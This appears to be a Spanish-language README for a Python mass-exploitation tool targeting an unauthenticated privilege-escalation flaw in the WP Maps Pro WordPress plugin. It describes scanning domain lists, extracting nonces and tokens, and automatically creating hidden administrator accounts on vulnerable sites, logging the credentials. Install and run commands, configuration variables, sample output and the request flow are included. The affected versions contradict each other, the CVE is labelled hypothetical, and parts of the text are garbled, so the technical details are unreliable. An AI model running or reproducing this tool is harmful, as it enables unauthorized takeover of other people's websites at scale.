
WP Maps Pro <= 6.1.0 - Escalada de Privilegios no Autenticada mediante Creación de Cuenta de Administrador en la Acción AJAX wpgmp_temp_access_ajax
Esta herramienta explota CVE-2026-8732, una vulnerabilidad en el plugin WP Google Map Pro para WordPress. La vulnerabilidad permite a un atacante no autenticado obtener un wpmp_token válido a través de un endpoint AJAX (admin-ajax.php?action=wpgmp_temp_access_ajax). Usando este token, un atacante puede acceder al panel de administración de WordPress y crear un nuevo usuario administrador.
La herramienta realiza escaneo masivo desde una lista de dominios, extrae el nonce y el token, y automáticamente crea una cuenta de administrador oculta en sitios vulnerables. Los resultados se guardan en tiempo real con todos los detalles del token.
⚠️ AVISO: Esta herramienta es solo para pruebas de seguridad educativas y autorizadas. Utilícela únicamente en sistemas que posea o para los que tenga permiso explícito de prueba. El autor no se hace responsable por el mal uso.
Puede ver el descargo de responsabilidad adicional en la portada de Jenderal92. Puede consultarlo AQUÍ !!!
admin_created.txthttp:// como https://requestsInstale la librería requerida:
pip install requests
git clone https://github.com/Jenderal92/CVE-2026-8732.git
cd CVE-2026-8732
Prepare un archivo de lista de objetivos (un dominio por línea):
example.com
https://target-website.com
http://vulnerable-site.org
Ejecute el escáner:
python2 exploit.py targets.txt
| Archivo | Contenido |
|---|---|
res.txt | Dominios vulnerables con token completo y URL de redirección (si la hay) |
admin_created.txt | Credenciales de administrador creadas exitosamente (dominio, usuario, contraseña, correo) |
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
Edite las siguientes variables dentro del script:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
wpgmp_local o fc-call-nonce del HTML./wp-admin/admin-ajax.php con action=wpgmp_temp_access_ajax y el nonce obtenido./wp-admin/user-new.php, extrae _wpnonce_create-user, y envía un POST para crear un nuevo usuario administrador.users.php o busca el nuevo nombre de usuario en la lista de usuarios para confirmar el éxito.wpgmp_temp_access_ajax mediante código personalizado o cortafuegos.admin-ajax.php.Este software se proporciona "TAL CUAL" sin garantía de ningún tipo. Todo el riesgo en cuanto a la calidad y el rendimiento del software recae en usted. Úselo responsablemente y solo en sistemas que esté autorizado a probar.
| Campo | Valor |
|---|
| ID CVE | CVE-2026-8732 (hipotético para este plugin) |
| Plugin afectado | WP Google Map Pro (versiones <= 1.5.0) |
| Tipo de vulnerabilidad | Control de acceso roto / Escalada de privilegios |
| Vector de ataque | No autenticado, remoto |
| Impacto | Toma completa del sitio mediante creación de cuenta de administrador |